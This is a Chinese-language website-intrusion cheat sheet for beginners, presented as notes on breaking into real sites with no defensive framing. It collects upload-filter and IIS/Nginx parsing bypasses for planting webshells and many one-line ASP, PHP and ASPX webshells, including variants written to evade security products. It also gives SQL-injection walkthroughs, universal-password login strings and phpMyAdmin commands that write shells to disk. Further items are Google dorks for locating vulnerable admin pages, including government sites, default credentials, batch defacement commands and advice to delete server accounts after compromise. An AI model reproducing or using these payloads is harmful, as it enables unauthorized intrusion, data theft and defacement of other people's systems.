新手入侵筆記

【 拿shell 】

 1.直接上傳asp asa jsp cer php aspx htr cdx 格式的木馬，不行就利用IIS6.0解析漏洞」:1.asp;1.jpg/1.asp;.jpg/1.asp;jpg/1.asp;.xls

 2.上傳圖片木馬遇到攔截系統，連圖片木馬都上傳不了，記事本打開圖片木馬在代碼最前面加上gif89a，通常就能逃過攔截系統了。

 3.上傳圖片木馬把地址複製到數據庫備份裏備份成asp木馬，有時不成功就利用IIs6.0解析漏洞嘗試突破。

 4.上傳圖片木馬再用抓包工具進行抓包，用明小子的綜合上傳功能，複製上傳地址及cookies填到對應的框裏，點擊上傳便可。

 

5.當後臺有數據庫備份蛋沒有上傳點時，把一句話木馬插到任意處，再到數據庫備份裏備份成asp木馬，以後用一句話客戶端鏈接木馬便可。

6.後臺點擊修改密碼，新密碼設置爲：1″:eval request(「h」)’設置成功後鏈接asp/config.asp便可拿下shell

 7.當頁面提示「上傳格式不正確[從新上傳]」 則說明存在上傳漏洞，複製地址放到明小子裏上傳，通常都能直接拿下shell。

 8.當後臺沒有數據庫備份但有數據庫恢復的狀況下，請不要猶豫，數據庫恢復跟數據庫備份功能是同樣的，直接邪惡吧。

 9.若是知道網站的數據庫是asp的，直接在前臺找留言板插入一句話木馬，鏈接配置文件inc/config.asp便可拿下shell。

10.當網站前臺有「會員註冊」 註冊一個帳戶進去看看有沒有上傳點，有的話直接上傳asp木馬以及利用iis6.0解析漏洞，不行就抓包用明小子上傳。

11.先上傳一個.ashx的文件，在筆記裏搜索可找到方法，結果是訪問會生成一句話木馬文件，後臺上傳、編輯器上傳、上傳漏洞頁面都可使用此方法。

12.當頁面提示只能上傳jpg|gif|png等格式的時候，右鍵查看源文件，本地修改成asp|asa|php再本地上傳便可拿下shell。

13.當用啊D檢測注入點提示SA權限或DB權限的時候，嘗試列目錄找到網站物理路徑，再點擊cmd/上傳，直接上傳asp木馬便可，不行就差別備份拿shell。

14.對於一些上傳漏洞的上傳頁面，以及後臺找到的上傳頁面，能夠嘗試用本地雙文件上傳突破，第一個選jpg第二個選cer，推薦使用火狐瀏覽器。

=============================================================================================================================================================

【 滲透技巧 】

1.某些cms的網站設置過濾不嚴，直接在網站後面加上admin/session.asp 或 admin/left.asp 能夠繞事後臺驗證直接進去後臺。

2.提下服務器以後建議抓下管理員哈希值，而後刪除全部用戶包括本身的，之後登陸這臺服務器就用管理員的帳號密碼登陸，這樣比較安全。

3.入侵網站以前鏈接下3389，能夠鏈接上的話先嚐試弱口令，不行就按5次shift鍵，看看有沒有shift後門。

4.訪問後臺地址時彈出提示框「請登錄」 把地址記出來(複製不了)放到「網頁源代碼分析器」裏，選擇瀏覽器-攔截跳轉勾選–查看便可直接進入後臺。

5.突破防盜鏈系統訪問shell代碼：javascript:document.write(「<a href=’ http://www.xxx.com/uploadfile/1.asp‘>fuck</a>」) 點擊GO便可進入shell。

6.遇到一流信息監控攔截系統時，上傳圖片木馬或是在木馬代碼最前面加上gif89a便可逃過檢測。

7.eweb編輯器後臺，增長了asp|asa|cer|php|aspx等擴展名上傳時都被過濾了，嘗試增長一個aaspsp，再上傳asp就會解析了。

8.用注入工具猜解到表段卻猜解不到字段的時候，到網站後臺右鍵查看源文件，通常帳號密碼後面的就是字段，以後在注入工具裏添加字段進行猜解便可。

9.當注入工具猜解表段，但猜解字段時提示長度超過50之類，不妨扔到穿山甲去猜解一下。

10.得知表段跟字段以後，使用SQL語句在ACCESS數據庫里加個用戶名及密碼的語句：Insert into admin(user,pwd) values(‘jianmei’,'daxia’)

11.當得到管理員密碼殊不知道管理員賬號時，到網站前臺找新聞連接，通常「提交者」「發佈者」的名字就是管理員的賬號了。

12.爆破ASP+IIS架設的網站web絕對路徑，假設網站主頁爲： http://www.xxxxx/index.asp/ 提交 http://www.xxxxx.cn/fkbhvv.aspx/，fkbhvv.aspx是不存在的。

13.有的站長很懶什麼也不改，當咱們得知網站的cms的時候，不妨去下載一套找找數據庫路徑，以及敏感信息，再嘗試默認相關的可利用資源。

14.菜刀裏點擊一句話木馬右鍵，選擇虛擬機終端，執行命令出現亂碼時，返回去設置編碼那裏，將默認的GB2312改成UTF-8.

15.入侵千萬別忘了ftp，試試諾口令，ftp的默認端口：21  默認賬號密碼：test

16.破解出md5爲20位結果，只須要把前三位和後一位去掉，剩餘16位拿去解密便可

17.好多網站的後臺地址是：admin_index.asp manage_login.asp

18.有時在木馬代碼里加上了gif89a，上傳成功訪問的時候卻出現了像圖片同樣的錯誤圖像，說明服務器把gif89a當作圖片來處理了，不要帶gif89a便可。問就能夠了。

19.找eweb編輯器的時候，若是默認的被改了，到前臺去找圖片右鍵看下路徑，根據圖片的目錄猜eweb編輯器的目錄，後臺也是用此思路。

20.IIS註冊表全版本泄漏用戶路徑和FTP用戶名漏洞：HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\MSFtpsvc\Parameters\Virtual Roots\

21.掃旁站的時候，是否是想看每一個站點是什麼cms呢？用軒轅劍掃描就能夠顯示系統特徵。

22.網站的主站通常都很安全，這時就要旁註或C段了，可是想知道各個IP段開放了什麼端口嗎？用「啊D網絡工具包」裏面的IP端口掃描最理想了。

23.手工檢測注入點彈出「你的操做已被記錄!」之類的信息，訪問這個文件：sqlin.asp，若是存在，在注入點後面植入一句話木馬：‘excute(request(「TNT」))
接着用一句話木馬客戶端鏈接： http://www.xxx.com/sqlin.asp，上傳木馬便可拿下shell，由於不少防注入程序都是用」sqlin.asp「這個文件名來作非法記錄的數據庫。

24.有的後臺不顯示驗證碼，往註冊表裏添加一個ceg便可突破這個困境了，把下面的代碼保存爲Code.reg，雙擊導入就能夠了。
REGEDIT4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
「BlockXBM」=dword:00000000

25.內網滲透時儘可能少登陸3389，以避免被管理員發現；

26.旁註的時候，建議挑php的站點來日，由於php站點通常都支持aspx腳本，這樣對於提權跟跨目錄都輕鬆.!

 

=============================================================================================================================================================

【 手工注入 】

IE瀏覽器-工具-Internet選項-高級-顯示友好HTTP錯誤信息前面的勾去掉，不然不論服務器返回什麼錯誤，IE都只顯示爲HTTP 500服務器錯誤，不能得到更多的信息。

手工注入時若是網站過濾了 and 1=1  and 1=2 ，能夠用xor 1=1  xor 1=2 進行判斷。

第一步：找注入點

（數字型） http://www.xxx.com/show.asp?id=7

加’           程序報錯

加and 1=1     返回正常頁面

加and 1=2     返回錯誤頁面

（字符型） http://www.xxx.com/show.asp?id=ade7

加’            程序報錯

加’and ’1′=’1  返回正常頁面

加’and ’1′=’2  返回錯誤頁面

新型檢測注入點的方法：

在URL地址後面加上-1，若返回的頁面和前面不一樣，是另外一個正常的頁面，則表示存在注入漏洞，並且是數字型的注入漏洞。

在URL地址後面加上-0，若返回的頁面和以前的頁面相同，而後加上-1，返回錯誤頁面，則也表示存在注入漏洞，並且是數字型的。

若是報錯提示這個：

Microsoft JET Database Engine 錯誤 ’80040e14′

語法錯誤 (操做符丟失) 在查詢表達式 ‘ID = 6 ord by’ 中。

/fun/Function.asp，行 657

解明：經過 JET 引擎鏈接數據庫，則是 Access數據庫，經過 ODBC 引擎鏈接數據庫，則是 MSSQL數據庫。

 

第二步：猜字段數

語句：order by 5

若是猜6的時候返回出錯，就繼續往回猜，直到返回正確爲止…

第三步：UNION命令

語句：and 1=2 union select 1,2,3,4,5–

看看哪裏能夠替換，假如顯示有2，就在2這裏替換SCHEMA_NAME，見下

第三步：猜庫名

語句：and 1=2 union select 1,SCHEMA_NAME,3,4,5 from information_schema.SCHEMATA limit 1,1

第四步：猜表段

語句：and 1=2 union select 1,TABLE_NAME,3,4,5 from information_schema.TABLES where TABLE_SCHEMA=0x68667A7338383838 limit 1,1

注意，TABLE_SCHEMA=後面的庫名必須是hex轉換過的格式，倒數第二個1一直替換，直到爆出全部表段，而後選最可能性的那個。

第五步：猜字段

and 1=2 union select 1,COLUMN_NAME,3,4,5 from  information_schema.COLUMNS where TABLE_NAME=0x615F61646D696E limit 1,1

注意，TABLE_SCHEMA=後面的表段必須是hex轉換過的格式，倒數第二個1一直替換，直到爆出全部字段，而後選最可能性的那兩個。

第六步：猜內容

語句一：and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from admin

首先讓程序報錯，因此在注入點後面加上 and 1=2

語句二： http://www.xxx.com/show.asp?id=-178 union select 1,2,3,4,5,6,7,8,9,10,11,12 from admin

一樣是先讓程序報錯，在178這個參數前面加上 -

當列名賬號跟列名密碼都猜解對的時候，頁面將會顯示相對應的內容，通常的密碼都通過MD5加密了，解密地址： http://www.cmd5.com/ ;  UserName  Password

=============================================================================================================================================================

【 常見網站程序 】

asp類：

foosun(風訊)

kesion(科汛)

 

newasp(新雲)

喬客

 

CreateLive(創力)

5uCMS

 

KingCMS

DvBBS(動網)

BBSxp

 

[博客]zblog

[博客]pjblog

PHP類：

DeDeCms（織夢）

ECMS（帝國）

PHPCMS

PHP168

HBcms（宏博）

 

SupeSite

CMSware(思惟)

 

Joomla!

[BBS]Discuz!

[BBS]phpWind

 

[SNS]UCenterHome

[SNS]ThinkSNS

 

[商城]EcShop

[商城]ShopEx

 

[博客]WordPress

[維基]HDWiki

[微博]PHPsay

 

[DIGG]PBdigg

( php開源mysql絕對路徑 )

開源系統             數據庫配置文件名                  文件名所在的目錄
Discuz!              config.inc.php                    ./ config.inc.php
Phpcms               config.inc.php                    ./include/config.inc.php
Wodpress             wp-config.php                     ./ wp-config.php
Phpwind              sqlconfig.php                     ./data/sqlconfig.php
phpweb               config.inc.php                    ./config.inc.php
Php168v6             mysql_config.php                  ./php168/ mysql_config.php
Shopex               config.php                        ./config/config.php
Ecshop               config.php                        ./data/config.php
Joomla               configuration.php                 ./ configuration.php
UCenter              config.inc.php                    ./data/config.inc.php
EmpireCMS            config.php                        ./e/class/config.php
Dedecms              common.inc.php                    .data/common.inc.php
Zen Cart             configure.php                     ./includes/configure.php
Mediawiki            localsettints.php                 ./config/localsettints.php
Ecshop               config.php                        ./data/config.php
osCommerce           configure.php                     ./includes/configure.php

=============================================================================================================================================================

【 谷歌黑客語法 】

site：能夠限制你搜索範圍的域名.

inurl：用於搜索網頁上包含的URL，這個語法對尋找網頁上的搜索，幫助之類的頗有用.

intext: 只搜索網頁<body>部分中包含的文字(也就是忽略了標題、URL等的文字)

intitle: 查包含關鍵詞的頁面，通常用於社工別人的webshell密碼

filetype：搜索文件的後綴或者擴展名

intitle：限制你搜索的網頁標題.

link: 能夠獲得一個全部包含了某個指定URL的頁面列表.

查找後臺地址：site:域名 inurl:login|admin|manage|member|admin_login|login_admin|system|login|user|main|cms

查找文本內容：site:域名 intext:管理|後臺|登錄|用戶名|密碼|驗證碼|系統|賬號|admin|login|sys|managetem|password|username

查找可注入點：site:域名 inurl:aspx|jsp|php|asp

查找上傳漏洞：site:域名 inurl:file|load|editor|Files

找eweb編輯器：site:域名 inurl:ewebeditor|editor|uploadfile|eweb|edit

存在的數據庫：site:域名 filetype:mdb|asp|#

查看腳本類型：site:域名 filetype:asp/aspx/php/jsp

迂迴策略入侵：inurl:cms/data/templates/images/index/

利用谷歌黑客快速找到本身想要的資料：site:qiannao.com 提權視頻

=============================================================================================================================================================

【 一句話木馬 】

asp一句話木馬：<%eval request(「x」)%>

php一句話木馬：<?php eval($_POST[g]);?>

aspx一句話：<%@ Page Language=」Jscript」%><%eval(Request.Item["x"],」unsafe」);%>

數據庫加密一句話(密碼a)：┼攠數畣整爠煥敵瑳∨≡┩愾

網站配置、版權信息專用一句話：」%><%Eval Request(x)%>

一句話再過護衛神：<%Y=request(「x」)%> <%execute(Y)%>

過攔截一句話木馬：<% eXEcGlOBaL ReQuEsT(「x」) %>

asp閉合型一句話 %><%eval request(「0o1Znz1ow」)%><%

能過安全狗的解析格式：;hfdjf.;dfd.;dfdfdfd.asp;sdsd.jpg

突破安全狗的一句話：<%Y=request(「x」)%> <%eval(Y)%>

elong過安全狗的php一句話：<?php  $a = 「a」.」s」.」s」.」e」.」r」.」t」;  $a($_POST[cc]);  ?>

後臺經常使用寫入php一句話（密碼x）：

<?
$fp = @fopen(「c.php」, ‘a’);
@fwrite($fp, ‘<’.'?php’.」\r\n\r\n」.’eval($_POST[x])’.」\r\n\r\n?」.」>\r\n」);
@fclose($fp);
?>

 

高強度php一句話：

<?php substr(md5($_REQUEST['heroes']),28)==’acd0′&&eval($_REQUEST['c']);?>

新型變異PHP一句話(密碼b4dboy):

($b4dboy = $_POST['b4dboy']) && @preg_replace(‘/ad/e’,’@’.str_rot13(‘riny’).’($b4dboy)’, ‘add’);

 

突破安全狗的aspx一句話：

<%@ Page Language=」C#」 ValidateRequest=」false」 %>
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密碼"].Value))).CreateInstance(「c」, true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>

 

突破護衛神，保護盾一句話：

<?php $a = str_replace(x,」",」axsxxsxexrxxt」);
$a($_POST["test"]); ?>

 

許多網頁程序都不容許包含〈%%〉標記符號的內容的文件上傳，這樣一句話木馬就寫入不進數據庫了。

改爲：〈scriptlanguage=VBScript runat=server〉execute request(「l」)〈/Script〉

這樣就避開了使用〈%%〉，保存爲.ASP,程序照樣執行的效果是同樣的。

 

PHP高強度一句話：

<?php substr(md5($_REQUEST['x']),28)==’acd0′&&eval($_REQUEST['c']);?>   菜刀鏈接：/x.php?x=lostwolf  腳本類型：php  密碼：c

<?php assert($_REQUEST["c"]);?>    菜刀鏈接 躲避檢測 密碼：c

=============================================================================================================================================================

【 解析漏洞總結 】

IIS 6.0

目錄解析：/xx.asp/xx.jpg  xx.jpg可替換爲任意文本文件(e.g. xx.txt)，文本內容爲後門代碼
IIS6.0 會將 xx.jpg 解析爲 asp 文件。
後綴解析：/xx.asp;.jpg     /xx.asp:.jpg(此處需抓包修改文件名)
IIS6.0 都會把此類後綴文件成功解析爲 asp 文件。
默認解析：/xx.asa    /xx.cer   /xx.cdx
IIS6.0 默認的可執行文件除了 asp 還包含這三種
此處可聯繫利用目錄解析漏洞 /xx.asa/xx.jpg 或 /xx.cer/xx.jpg 或 xx.asa;.jpg

 

IIS 7.0/IIS 7.5/Nginx <8.03

在默認Fast-CGI開啓情況下,在一個文件路徑(/xx.jpg)後面加上/xx.php會將 /xx.jpg/xx.php 解析爲 php 文件。
經常使用利用方法： 將一張圖和一個寫入後門代碼的文本文件合併 將惡意文本寫入圖片的二進制代碼以後，避免破壞圖片文件頭和尾
e.g.
copy xx.jpg/b + yy.txt/a xy.jpg
/b 即二進制[binary]模式
/a 即ascii模式 xx.jpg正常圖片文件
yy.txt 內容 <?PHP fputs(fopen(‘shell.php’,'w’),’<?php eval($_POST[cmd])?>’);?>
意思爲寫入一個內容爲 <?php eval($_POST[cmd])?> 名稱爲shell.php的文件
找個地方上傳 xy.jpg ,而後找到 xy.jpg 的地址，在地址後加上 /xx.php 便可執行惡意文本。
.而後就在圖片目錄下生成一句話木馬 shell.php 密碼 cmd

=============================================================================================================================================================

【 ewebeditor編輯器 】

默認後臺：ewebeditor/admin_login.asp

賬號密碼：admin admin

樣式設計：ewebeditor/admin_style.asp

查看版本：ewebeditor/dialog/about.html

數據庫路徑：db/ewebeditor.mdb    db/%23ewebeditor.mdb    db/%23ewebeditor.asp  ewebeditor/db/!@#ewebeditor.asp (用谷歌語法找文件名)

遍歷目錄：ewebeditor/admin/upload.asp?id=16&amp;d_viewmode=&amp;dir =../..

跳轉目錄：ewebeditor/admin_uoloadfile.asp？id=14&dir=..  (dir爲列目錄, ..爲返回上層目錄)，形式:dir ../..

點上傳文件管理-隨便選擇一個樣式目錄，獲得：ewindoweditor/admin_uoloadfile.asp?id=14 在id=14後面加&dir=../../../.. 就可看到整個網站的文件了(../本身加減)

 

( ewebeditor5.5版本 )

默認後臺：ewebeditor/admin/login.asp

賬號密碼：admin  198625

數據庫路徑：data/%23sze7xiaohu.mdb

遍歷目錄：ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir=../

調用樣式上傳頁面：ewebeditor/ewebeditor.htm?id=body&style=popup

 

( ewebeditor3.8 php版本 )

默認後臺：eWebEditor/admin/login.php

首先隨便輸入一個賬號和密碼，接着系統會提示出錯，這時清空瀏覽器的url，而後輸入如下代碼後連按三次回車鍵：

javascript:alert(document.cookie=」adminuser=」+escape(」admin」));javascript:alert(document.cookie=」adminpass=」+escape(」admin」));javascript:alert(document.cookie=」admindj=」+escape(」1」));

接着訪問文件：ewebeditor/admin/default.php  就能夠直接進入後臺了。

 

( ewebeditor編輯器exp手冊 )

有時候什麼後綴都上傳了，仍是不行。就增長一個asp:jpg格式 上傳asp:jpg 試試

一：文件上傳成功了，可是訪問不成功，說明該目錄(好比：/UploadFile)被設置了權限，返回去換成/ 上傳到根目錄就好了.增長asp等不行的時候，能夠利用解析asp;jpg

 

二：下載數據庫查看前人留下的痕跡，再訪問上傳頁面拿shell。

頁面路徑：/ewebeditor.asp?id=48&style=popu7 用工具瀏覽數據庫找到已添加asp|asa|cer|php的欄目，把S_ID跟S_Name的值替換在語句裏訪問，上傳相對應的格式木馬。

 

=============================================================================================================================================================

【 fckeditor編輯器 】

查看版本：fckeditor/editor/dialog/fck_about.html

                  FCKeditor/_whatsnew.html

編輯器頁面：FCKeditor/_samples/default.html

上傳頁面：fckeditor/editor/filemanager/connectors/test.html

                 /editor/editor/fckeditor.html

                FCKeditor/editor/filemanager/connectors/aspx/connector.aspx

               FCKeditor/editor/filemanager/connectors/uploadtest.html

遍歷目錄：FCKeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/

編輯頁面：fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp

查看文件上傳路徑：fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=

 

( 拿shell方法總結 )

ASPX的站幾乎都用fck編輯器，建議用工具掃一下，記住inc目錄下可能存在fck編輯器，掃下這個目錄。

一：若是是iis6.0，上傳兩次 1.asp;.jpg 或者1.asp;1.jpg 或者建立x.asp目錄，再在這個目錄下上傳x.jpg 或者直接上傳1.asp;jpg 均可以完美解析拿下shell

二：第一次上傳1.asp;1.jpg，被重命名爲：1_asp;1.jpg，可是第二次上傳1.asp;1.jpg，就有可能變成：1.asp;1(1).jpg

三：iis7.5+fck的解析文件爲：a.aspx.a;.a.aspx.jpg..jpg.aspx

四：若是不是iis6.0 上傳1.asp;jpg而後抓包，接下來改包，將分號變成空格，再用c32把20改爲00，保存，利用%00 截斷分號兩次

五：成功訪問別人的一句話木馬頁面， http://glavesoft.com/UploadFiles\EditorFile\file/2.asp;2(1).jpg  但不知道密碼
http://glavesoft.com/UploadFiles\EditorFile\file\2_asp;2.jpg 這個是圖片木馬，沒有成功利用iis6.0解析漏洞仍是圖片，下載下來用記事本打開找到密碼。

六：IIS7.0/7.5 通殺oday，把php一句話木馬後綴改爲1.jpg傳上去，找出一句話的路徑後，在1.jpg的後面添加/.php  例如： http://www.xxx.com/iges/php.jpg/.php

 

( 創建文件夾 . 變 _ 的突破方法 )

利用Fiddler web debugger 這款工具來進行修改數據包，從而達到突破的目的。

注意：安裝Fiddler web debugger，須要安裝.net環境以及.net的SP2補丁方可運行！

1.打開fck的上傳頁面，例如：fckeditor/editor/filemanager/browser/default/connectors/test.html

2.再打開Fiddler web debugger這款工具，點擊設置–自動斷點–選擇 「請求以前」

3.接着打開fck的上傳頁面，建立文件夾，並輸入你想要建立的文件名，例如：x.asp

4.而後返回到Fiddler web debugger這款工具裏，選擇連接–點擊右側的嗅探

5.修改currentfolder內的參數，改爲你要創建的文件夾名字，如：x.asp

6.而後點擊右側的：run to completion

7.再點擊軟件設置–自動斷點–禁用，再到瀏覽器裏點擊肯定創建文件夾，你就會發現文件夾創建爲x.asp了

=============================================================================================================================================================

 

【 linux 】

解析格式：1.php.xxx (xxx能夠是任意)

若是apache不認識後綴爲rar的文件，咱們就用1.php.rar格式上傳，文件就會被服務器當作PHP腳本解析。

辨別linux系統方法，例如： http://www.xxx.com/xxx/abc.asp?id=125 把b換成大寫B訪問，若是出錯了，就說明是linux系統，反之是windows系統.

=============================================================================================================================================================

【 旁註 】

旁註的技巧就是挑選支持aspx的站來日，這樣提權時候但願較大，如何探測服務器上哪些站點支持aspx呢? 利用bing搜索： http://cn.bing.com/ 搜索格式：ip:服務器ip aspx

好比要入侵一個網站，想知道該網站支不支持aspx，就在網站後面隨便加上一個xxx.aspx回車，若是顯示的不是iis默認的錯誤頁面，而是這種：「/」應用程序中的服務器錯誤，說明支持aspx馬。

=============================================================================================================================================================

【 phpmyadmin 】

查看版本：test.php 或 phpinfo.php

默認帳號密碼：root root

萬能賬號密碼：’localhost’@'@」 密碼空

拿shell第一種方法：
CREATE TABLE `mysql`.`darkmoon` (`darkmoon1` TEXT NOT NULL );
INSERT INTO `mysql`.`darkmoon` (`darkmoon1` ) VALUES (‘<?php @eval($_POST[pass]);?>’);
SELECT `darkmoon1` FROM `darkmoon` INTO OUTFILE ‘d:/wamp/www/darkmoon.php’;
DROP TABLE IF EXISTS `darkmoon`;

 

拿shell第二種方法：
Create TABLE moon (darkmoon text NOT NULL);
Insert INTO moon (darkmoon) VALUES(‘<?php @eval($_POST[pass]);?>’);
select darkmoon from moon into outfile ‘d:/wamp/www/darkmoon2.php’;
Drop TABLE IF EXISTS moon;

拿shell第三種方法：
select ‘<?php @eval($_POST[pass]);?>’INTO OUTFILE ‘d:/wamp/www/darkmoon3.php’

拿shell第四種方法
select ‘<?php echo \’<pre>\’;system($_GET[\'cmd\']); echo \’</pre>\’; ?>’ INTO OUTFILE ‘d:/wamp/www/darkmoon4.php’
127.0.0.1/darkmoon4.php?cmd=net user

找到mysql數據庫，執行sql語句便可寫入一句話，再菜刀鏈接便可。

phpmyadmin脫褲：在這裏面是能夠直接拖庫的，如同上傳php拖庫腳本同樣，操做差很少的。

 

修改mysql默認的root用戶名方法:

進入phpmyadmin,進入mysql表,執行sql語句

1.update user set user=’你的新root用戶名’ where user=’root’;
2.flush privileges;

例如：

用root身份登入，進入mysql庫，修改user表便可。
1.use mysql;
2.
3.mysql>update user set user=’newName’ where user=’root’;
4.
5.mysql> flush privileges;

=============================================================================================================================================================

【 萬能密碼 】

( php )

賬號：’ UNION Select 1,1,1 FROM admin Where 」=’
密碼：1

( asp )

‘xor

‘or’='or’

‘or」=」or」=’

‘or ’1′=’1′or ’1′=’1

‘or 1=1/*

=============================================================================================================================================================

【 批量關鍵詞 】

inurl:asp?id=
inurl:detail.php?
CompHonorBig.asp?id=           牛比
inurl:show.asp? 很是強大！！！！
site:www.yuming.com
inurl:articleshow.asp?articleid=數字 牛B
inurl:szwyadmin/login.asp
inurl:asp?id=1 intitle:政府
杭州 inurl:Article_Class2.asp?

=============================================================================================================================================================

【 批量掛黑頁 】

cmd命令執行 dir d:\wwwroot /b >>1.txt

以後命令 for /f 「tokens=* delims= 」 %i in (d:\1.txt) do echo pause>>D:\wwwroot\%i\wwwroot\1.txt

=============================================================================================================================================================

【 木馬後門 】

1.TNTHK小組內部版 —— 存在關鍵詞後門，隨便輸入一個錯的密碼，右鍵查看源文件，找到錯誤關鍵詞後面的font，在font後面的就是正確密碼。

2.不滅之魂—不死殭屍變種 —— 用這款工具專門爆這款大馬的密碼：爆不滅之魂密碼

3.終極防刪免殺多功能VIP版本-無後門 —— 萬能密碼：wbgz   菜刀鏈接：kk

=============================================================================================================================================================

【 安全狗 】

1.過注入

方法一：a.asp?aaa=%00&id=sql語句

方法二： a.asp?id=sql語句   裏面把安全過濾的加個%l 好比： un%aion sel%aect 1,2,3,4 fr%aom admin

2.過大馬被阻攔訪問

方法一：上傳一個大馬 而後訪問 http://sss.com/dama.asp ; 訪問後出現攔截。

那麼解決方法 先將dama.asp更名dama.jpg上傳，而後在同目錄上傳個文件da.asp 內容爲： <!–#include file=」dama.jpg」 –>  這樣再訪問da.asp  就不會被攔截了。

3.過菜刀鏈接一句話被攔截

方法一：不用菜刀鏈接一句話，用別的一句話鏈接端。

方法二：中轉下鏈接菜刀，把過濾掉的詞替換掉。

=============================================================================================================================================================

【 asp搜索框注入 】

在搜索框裏，咱們輸入一個關鍵詞，該關鍵詞必須在這個站能搜索到信息。好比這個站我輸入了1，搜索到了不少新聞，判斷這個搜索框是否有注入漏動。

直接在前臺的搜索框裏注入被限制的話，能夠本地構造表單進行注入：

<html>
<form name=」form1″ method=」post」 action=」 http://www.xxx.com/search.asp「>
類型：
<label>
<input name=」t」 type=」text」 id=」t」 value=」1″>
</label>
<p>
內容：
<label>
<input name=」key」 type=」text」 id=」key」>
</label>
</p>
<p>
<label>
<input type=」submit」 name=」Submit」 value=」提交」>
</label>
</p>
</form>

1%’ ‘ and ‘%’='         系統報錯

1%’ and 1=1 and ‘%’='   返回正確

1%’ and 1=2 and ‘%’='   返回錯誤

1%’ and (select count(*) from 表段) and ‘%’='   猜表段

1%’ and (select count(字段) from 表段) and ‘%’='  猜字段

1%’ and (select top 1 len(字段) from 表段)>16 and ‘%’='  猜字段長度

1%’ and (select top 1 asc(mid(name,1,1)) from 表段)>97 and ‘%’='   猜內容

用牛族字符轉換器轉換數字。（猜長度的時候，選擇對的前面那個錯的數字！或是直接把大於號改成等於號，看看正確就是了）

有的網站存在搜索框，利用這個搜索框進行注射從而爆出管理賬號密碼：%’ and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where ‘%’=’

咱們在搜索框裏，搜索關鍵詞1瀏覽器地址欄顯示： http://www.XXXXXX.com/News_search.asp?key=1&otype=msg

這裏的key=1，就是說咱們搜索得關鍵詞1，咱們要作的就是把key=1放到最後面，把鏈接變成： http://www.XXXXXX.com/News_search.asp?otype=msg&key=1

或者直接把&otype=msg刪除，變成： http://www.XXXXXX.com/News_search.asp?key=1

=============================================================================================================================================================

【 本地構造上傳漏洞  】

尋找程序上傳漏洞，必須從上傳頁面的源文件入手，目標有兩個：

1.filename (文件名稱)  在上傳頁面中針對文件擴展名過濾不嚴，從而上傳可執行的腳本木馬。
2.filepath (文件路徑)  在上傳頁面針對路徑過濾不嚴，致使能夠修改上傳相對路徑上傳腳本木馬。

當檢測到一個上傳頁面，asp、asa後綴已經被過濾掉的時候，能夠嘗試抓包明小子或NC上傳！

不行就利用本地上傳漏洞構造上傳！例如上傳頁面是： http://www.baidu.com/upfile_other.asp

1.右鍵查看源文件，找到這段代碼：<form name=」form1″ method=」past」 action=」zwhua_upload1.asp」 enctype=」multipart/form-data」>

  把以上代碼中actino處的路徑補全！即：<form name=」form1″ method=」past」 action=」 http://www.xxx.com/zwhua_upload1.asp」 enctype=」multipart/form-data」>

2.再找到這段代碼：<input type=」hidden」 name=」filepath」 value=」uploadfile/」>

  利用IIS6.0解析漏洞，把以上代碼中value處的文件補全！即：<input type=」hidden」 name=」filepath」 value=」uploadfile/1.asa; 「>  注意：冒號後面有空格！

3.接着保存爲1.html，將剛保存的文件拖進去C32裏，選擇十六進制模式，找到「1.asa; 」後面的空格，將其填充爲00後保存退出！

4.本地打開上傳圖片格式的木馬(不成功時能夠嘗試上傳一句話木馬) ，若是提示成功後不顯示路徑的話，能夠右鍵查看源文件本身手工找出路徑訪問便可！

=============================================================================================================================================================

【 利用雙文件上傳拿shell 】

由於網站只判斷一次，若是第一個文件後綴是在白名單裏面的話，就讓其上傳，並無判斷第二個文件，因此上傳任意格式的文件也讓其經過。

當系統驗證cookie的時候，就要用到火狐瀏覽器了，登陸網站進後臺，讓火狐瀏覽器保存管理員的cookie值，再把修改後的「雙文件上傳工具」拖進去上傳。

1.在後臺找上傳點，右鍵查看源文件，找到上傳地址，通常在post或action的附近，搜索便可找到，通常爲：src=」../xxx.htm」  以後補全路徑訪問。

2.這個還不是真正的上傳頁面，真正的上傳頁面後綴是asp的，繼續查看源代碼，找到action=」xxx.asp」，補全路徑訪問便可！

4.其實也能夠抓包從而得到上傳路徑，抓包以後，在Referer:這欄，還有常見的是：htto://www.xxxx.com/upfile_other.asp

3.打開雙文件上傳工具，替換爲當前的上傳地址，保存後拖進火狐瀏覽器裏，第一個選擇jpg木馬，第二個選擇cer木馬，提交後右鍵查看源文件找出路徑便可。

=============================================================================================================================================================

【 數據庫備份抓包改包NC提交拿shell 】

當備份路徑不能修改,後綴又是mdb不變的時候，咱們可先對備份的過程進行抓包，再本地構造用NC提交便可突破備份，數據庫恢復也可以使用此方法！

在抓包的時候，最好用火狐瀏覽器，由於有的瀏覽器抓不到包，首先上傳一張圖片木馬複製下地址，接着對備份過程進行抓包！把抓到的數據複製在文本里面！

開始本地修改，先把POST處補全網址，找到最底下的一行數據，再複製多一行對比長度進行修改，把備份的數據名稱替換爲木馬地址，備份的名稱改成本身想要的asp後綴！

再將原來的數據長度跟如今的對比同時替換掉，最後看一共增長了多少個字符，就在Content-Length:處進行增減，用NC提交數據格式：nc 域名 80<1.txt

=============================================================================================================================================================

【 本地構造數據庫備份突破拿shell 】

當上傳jpg木馬獲得路徑前去備份時，發現數據庫備功能用不了的狀況下，能夠嘗試本地構造突破拿shell！

首先查看源文件，找到「當前數據庫路徑」修改成剛上傳jpg木馬的路徑，再找到「數據庫備份名稱」修改成1.asa

找到「<form method=」past」 action=」Backup.asp?action=Backup」>」 將路徑補全「<form method=」past」 action=」 http://xxx.com/admin/Backup.asp?action=Backup「>」

最後保存爲1.html，有的網站不驗證cookie的話，直接打開進行備份就能成功了，可是通常都須要驗證cookie，這時就用上火狐瀏覽器了。

